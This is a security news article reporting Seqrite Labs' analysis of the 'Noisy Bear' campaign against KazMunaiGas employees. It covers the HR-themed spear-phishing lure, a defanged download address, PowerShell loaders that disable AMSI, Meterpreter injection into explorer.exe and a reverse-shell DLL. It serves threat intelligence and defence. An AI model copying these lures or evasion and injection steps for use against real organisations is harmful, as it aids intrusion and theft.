Ddos 
Infection Chain | Image: Seqrite Labs APT-Team
The Seqrite Labs APT-Team has released an in-depth analysis of a newly discovered threat actor dubbed Noisy Bear, active since April 2025 and focusing on Kazakhstan’s oil and gas sector. The group’s tactics combine spear-phishing, PowerShell loaders, and DLL implants, leveraging decoy documents crafted to mimic internal communication from KazMunaiGas (KMG).
According to Seqrite, “this threat group has targeted entities in Central Asia, such as targeting the Oil and Gas or energy sector of Kazakhstan. The campaign is targeted towards employees of KazMunaiGas or KMG where the threat entity delivered a fake document related to KMG IT department, mimicking official internal communication and leveraging themes such as policy updates, internal certification procedures, and salary adjustments.”
Noisy Bear relies on spear-phishing emails sent from compromised KMG business accounts. Messages carried subjects like “URGENT! Review the updated salary schedule” and attached a ZIP archive (График.zip – Schedule.zip) containing a malicious shortcut file (График зарплат.lnk – Salary Schedule.lnk).
The email text was carefully crafted to appear as internal HR communication, emphasizing urgency with a deadline of May 15, 2025. Seqrite notes, “the message basically says about reviewing updated information about work schedules, salaries and incentives related policies and decisions.”
Opening the ZIP revealed a decoy PDF branded with the KazMunaiGas logo and bilingual instructions in Russian and Kazakh. Victims were told to extract another ZIP (KazMunayGaz_Viewer.zip) and run an executable while ignoring a console window.
The advisory explains, “the decoy also mentions users to wait for a console window to appear and specifically advised them not to close or interact with it, to limit suspicion on targets’ ends.”
Seqrite’s technical analysis breaks down the attack into four stages:
- Stage 0 – Malicious LNK: The shortcut executed PowerShell LOLBins to download a batch script (123.bat) from hxxps://77.239.125.41:8443.
- Stage 1 – Batch Scripts: Scripts like 123.bat and it.bat downloaded PowerShell loaders (support.ps1, a.ps1), dubbed DOWNSHELL.
- Stage 2 – DOWNSHELL Loaders: These PowerShell scripts disabled AMSI scanning and injected Meterpreter shellcode into explorer.exe using techniques copied from PowerSploit. Seqrite explains, “changing or flipping this flag convinces PowerShell that the AMSI has failed to initialize, so the other malicious script belonging to DOWNSHELL family, does not get scanned and executes without any hassle or interruption.”
- Stage 3 – DLL Implant: A 64-bit DLL used semaphores to prevent multiple instances, then hijacked rundll32.exe’s thread context to execute a reverse shell.
Noisy Bear hosted payloads and tools—including open-source penetration frameworks like Metasploit and PowerSploit—on infrastructure provided by Aeza Group LLC, a Russian hosting provider sanctioned for aiding cybercrime.
Seqrite also observed suspicious domains hosting wellness and fitness-themed sites for Russian individuals, likely serving as infrastructure camouflage.
- Russian-language comments in scripts.
- Use of sanctioned Russian hosting providers.
- Overlap in tooling and infrastructure with prior Russian-linked APT campaigns.
Donate